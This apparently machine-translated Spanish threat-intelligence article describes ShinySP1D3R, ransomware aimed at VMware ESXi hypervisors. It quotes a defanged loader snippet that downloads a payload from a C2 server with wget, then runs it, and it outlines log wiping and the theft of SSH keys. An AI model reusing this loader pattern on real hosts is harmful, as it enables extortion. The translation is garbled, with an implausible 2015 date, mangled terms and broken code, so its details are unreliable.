Al emerger a mediados de 2015, la plataforma ShinySP1D3R de ransomware como servicio (RAAS) representa la próxima evolución de las herramientas de extorsión centradas en la nube.
A diferencia del ransomware tradicional que se dirige a puntos finales de Windows o acciones de archivos de red, ShinySP1D3R está diseñado específicamente para infectar y cifrar VMware ESXI Hypervisors y sus almacenes de datos adjuntos.
Las implementaciones tempranas han demostrado una entrega de carga útil de dos etapas: el acceso inicial se obtiene a través de credenciales SSO comprometidas o claves SSH, seguido de un módulo secundario que se extiende lateralmente a través de grupos ESXI.
Las víctimas informan que una vez implementado, el ransomware enumera todas las máquinas virtuales, deshabilita la funcionalidad de instantáneas y comienza el cifrado AES-256 simultáneo de cada archivo VMDK.
Mensaje de extorsión de datos (Fuente – Eclecticiq)
El panel de control del proyecto ofrece opciones granulares de afiliados para adaptar el proceso de cifrado seleccionando almacenes de datos, especificando extensiones de archivos para apuntar y configurar el aceleración de la red para evadir la detección.
Los afiliados pueden monitorear el progreso en tiempo real y negociar términos de rescate utilizando un widget de chat integrado.
Mientras aún está bajo el desarrollo activo, ShinySP1D3R ya ha atraído el interés de múltiples foros subterráneos debido a su interfaz de administración optimizada y las robustas rutinas de manejo de errores, que aseguran que las ciencias parciales puedan reanudarse automáticamente después de las interrupciones del servicio.
Analistas de EclecticiQ observado Que shinysp1d3r esté listo para aprovechar la infraestructura de brillantes y las redes de afiliados existentes para expandir rápidamente su base de víctimas una vez madurado.
Funcionalmente, la arquitectura de ShinySP1D3R consiste en un cargador liviano y un demonio de cifrado con todas las funciones.
Equipo de Shinyhunters y conexión con araña dispersa (fuente – Eclecticiq)
El cargador es un script de shell independiente de la posición que infecta los hosts ESXi a través de llamadas SSH o API, organiza el demonio en la memoria y desencadena la ejecución, todo sin escribir archivos en el disco.
El demonio luego monta cada almacén de datos con bloqueos exclusivos, suspende cualquier VMS en ejecución para capturar instantáneas consistentes en la memoria y ejecuta un binario de cifrado basado en GO integrado.
Este binario emplea hilos de trabajadores concurrentes para maximizar el rendimiento y evitar activar alertas de rendimiento del hipervisor.
Mecanismo de infección
Los afiliados típicamente inician infecciones al cosechar las claves SSH de los servidores de gestión mal configurados o al abusar de los tokens SSO robados obtenidos a través de ataques de viscos.
Una vez autenticado, el script del cargador se implementa utilizando el shell de Busybox incorporado del host ESXi. Verifica los privilegios requeridos, luego obtiene la carga útil principal de ransomware de un servidor C2 a través de HTTPS.
AI Voice Agent Workflow en campañas de Vishing (Fuente – Eclecticiq)
El siguiente fragmento ilustra la lógica central del cargador:-
#!/bin/sh # shinysp1d3r carger para esxi c2 = “https (:) // srv (.) affiliateshinysp1d3r (.) com/payload” tmp = “/tmp/(.)shinyloader” wget – qo “$ tmp” “$ c2” && “chmod” + x “$ tmp” # ejecutute in rege in monement –esxi-user root –esxi-pass “$ {esxi_pass}”
Después de la ejecución, el cargador limpia registros para eliminar las trazas de auditoría y deshabilita el reenvío de syslog a servidores externos. El Daemon luego itera a través de cada ruta de almacén de datos debajo /VMFS /Volúmenes, bloquea los archivos utilizando la API VOMA de ESXI y aplica el cifrado en su lugar.
Al aprovechar el bloqueo de archivos locales del hipervisor, ShinySP1D3R asegura que no se puedan modificar o retroceder los discos virtuales, obligando a las víctimas a restaurar desde copias de seguridad fuera de línea o pagar el rescate.
¡Encuentra esta historia interesante! Séguenos Google News, LinkedIny incógnita Para obtener más actualizaciones instantáneas.
